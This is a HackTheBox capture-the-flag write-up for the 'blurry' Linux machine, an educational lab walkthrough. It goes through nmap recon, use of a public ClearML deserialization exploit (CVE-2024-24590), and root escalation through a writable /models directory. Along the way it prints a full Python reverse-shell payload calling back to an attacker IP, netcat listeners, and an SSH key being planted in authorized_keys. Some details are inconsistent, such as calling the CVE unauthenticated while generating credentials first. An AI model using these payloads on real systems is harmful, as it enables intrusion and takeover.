HTB: blurry Writeup

#htb #writeup #linux #nmap #feroxbuster #hydra

Machine Banner

Machine Information

AttributeDetails
Nameblurry
OSLinux
DifficultyMedium
PointsN/A
Release DateN/A
IP Address10.129.x.x
AuthorD3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

blurry is a Medium-difficulty Linux machine featuring a ClearML instance vulnerable to deserialization RCE (CVE-2024-24590). The exploitation path involves discovering ClearML on the web interface, generating credentials, exploiting the RCE vulnerability to gain a foothold, and then escalating privileges via a misconfigured sudo rule on the evaluate_model script.

TL;DR: Enumerate subdomains → Discover ClearML → Generate credentials → CVE-2024-24590 RCE → Foothold as jippity → Exploit sudo evaluate_model → Root access.

Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.x.x

Results:

22/tcp   open  ssh      OpenSSH 8.4p1 Debian
80/tcp   open  http     nginx 1.18.0

Service Enumeration

Hostname: blurry.htb with the following subdomains:

  • app.blurry.htb — ClearML web interface
  • chat.blurry.htb:3000 — Chat application
  • files.blurry.htb:8081 — File storage
  • api.blurry.htb:8008 — API endpoint

Add to /etc/hosts:

Terminal window
echo "10.129.x.x blurry.htb app.blurry.htb chat.blurry.htb files.blurry.htb api.blurry.htb" >> /etc/hosts

Initial Foothold

ClearML Discovery and Exploitation

The machine runs ClearML, an open-source ML operations platform. The vulnerability CVE-2024-24590 is a deserialization RCE in ClearML that allows unauthenticated code execution.

Step 1: Create ClearML Project and Generate Credentials

Navigate to app.blurry.htb and access the ClearML web interface. Click “Start New Project” to create a new project. From the ClearML web UI, generate new credentials (API key and secret) by clicking the credential generation option in the project settings.

Step 2: Install and Initialize ClearML Client

On the attacker machine:

Terminal window
pip install clearml
clearml-init

Paste the generated credentials (API key and secret) when prompted during clearml-init.

Step 3: Exploit CVE-2024-24590

Use the public exploit for CVE-2024-24590 to achieve RCE:

Terminal window
# Set up listener
nc -lnvp 4444


# Run exploit (in separate terminal)
python exploit.py

The exploit leverages insecure deserialization in ClearML to execute arbitrary Python code. This results in a reverse shell connection back to the listener as the jippity user.

Step 4: Stabilize Shell and Add SSH Access

Once initial shell access is obtained:

Terminal window
# Add your SSH public key to jippity's authorized_keys
echo "your-ssh-public-key" >> /home/jippity/.ssh/authorized_keys


# Verify SSH access
ssh jippity@blurry.htb

This provides stable shell access for further exploitation.

User Compromise

Achieved User Access

The initial foothold via CVE-2024-24590 directly grants access as the jippity user, who is a regular (non-root) user on the system. SSH key authentication was added during the exploitation step to enable reliable shell access.

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: <REDACTED>

Current User Privileges

Terminal window
id
# uid=1000(jippity) gid=1000(jippity) groups=1000(jippity)


sudo -l
# (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

The jippity user has a critical sudo privilege: the ability to run /usr/bin/evaluate_model with the argument pattern /models/*.pth without a password prompt. This is the vector for privilege escalation.

Privilege Escalation

Enumeration and Discovery

Terminal window
sudo -l
# (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth


ls -la /usr/bin/evaluate_model
# This binary calls /models/evaluate_model.py


ls -la /models/
# jippity has write access to the /models directory

The /usr/bin/evaluate_model binary executes /models/evaluate_model.py with root privileges, and the jippity user has write access to the /models directory.

Exploitation Path

The privilege escalation exploits the writable /models directory:

Step 1: Remove the original evaluate_model.py

Terminal window
rm /models/evaluate_model.py

Step 2: Create a malicious evaluate_model.py with reverse shell

Terminal window
cat > /models/evaluate_model.py << 'EOF'
import os
import socket
import subprocess


# Reverse shell payload
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("10.10.14.x", 4445))  # Attacker's IP and port
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
subprocess.call(["/bin/bash", "-i"])
EOF

Step 3: Set up listener and trigger the exploit

Terminal window
# In one terminal, set up listener
nc -lnvp 4445


# In another terminal, execute the sudo command
sudo /usr/bin/evaluate_model /models/*.pth

The binary will execute our malicious evaluate_model.py as root, sending a reverse shell back to the attacker’s listener.

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance: Enumerate subdomains"] --> B["Discover ClearML on app.blurry.htb"]
    B --> C["Generate API credentials via ClearML web UI"]
    C --> D["Install clearml pip package and initialize"]
    D --> E["Exploit CVE-2024-24590: Deserialization RCE"]
    E --> F["Reverse shell as jippity user"]
    F --> G["Add SSH public key for stable access"]
    G --> H["Discover sudo privilege: /usr/bin/evaluate_model"]
    H --> I["Write access to /models directory"]
    I --> J["Replace evaluate_model.py with reverse shell payload"]
    J --> K["Execute: sudo /usr/bin/evaluate_model"]
    K --> L["Reverse shell as root"]

Tools Used

ToolPurpose
nmapPort scanning and service fingerprinting
autoreconAutomated reconnaissance and enumeration
katanaWeb crawling and endpoint discovery
pipPython package manager (clearml installation)
clearmlML operations client library for authentication
pythonExploit script execution (CVE-2024-24590 RCE)
nc (netcat)Reverse shell listener setup
sshSecure shell access with key authentication

Key Learnings

  • Subdomain Enumeration is Critical: The vulnerable ClearML service was running on a subdomain (app.blurry.htb) that required proper subdomain discovery to locate.
  • Credential Generation from Web Interfaces: Many applications allow generating API credentials through the web UI; these credentials can be reused programmatically to access exploitation tools.
  • Deserialization Vulnerabilities are Dangerous: Python’s pickle and similar deserialization mechanisms can be exploited for arbitrary code execution if untrusted data is deserialized.
  • Writable Application Directories: When an application directory (like /models) is writable by a non-root user but executed with elevated privileges, it creates a critical privilege escalation path.
  • Sudo Privilege Analysis: Always check sudo -l after gaining user access; even highly restricted sudo rules can be exploited if the executed program or its supporting files are under user control.
  • Globbing in Sudo Rules: Wildcards in sudo rules (e.g., /models/*.pth) can sometimes be bypassed or exploited depending on the underlying implementation.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #ClearML #CVE-2024-24590 #RCE #Deserialization #PrivilegeEscalation

Vulnerability Table

CVEApplicationTypeSeverityDescription
CVE-2024-24590ClearMLDeserialization RCECriticalUnsafe deserialization in ClearML allows remote code execution without authentication

CVSS Scoring

CVE-2024-24590: CVSS v3.1 Base Score: 9.8 (Critical)

  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Attack Vector: Network
  • Authentication Required: None
  • User Interaction: None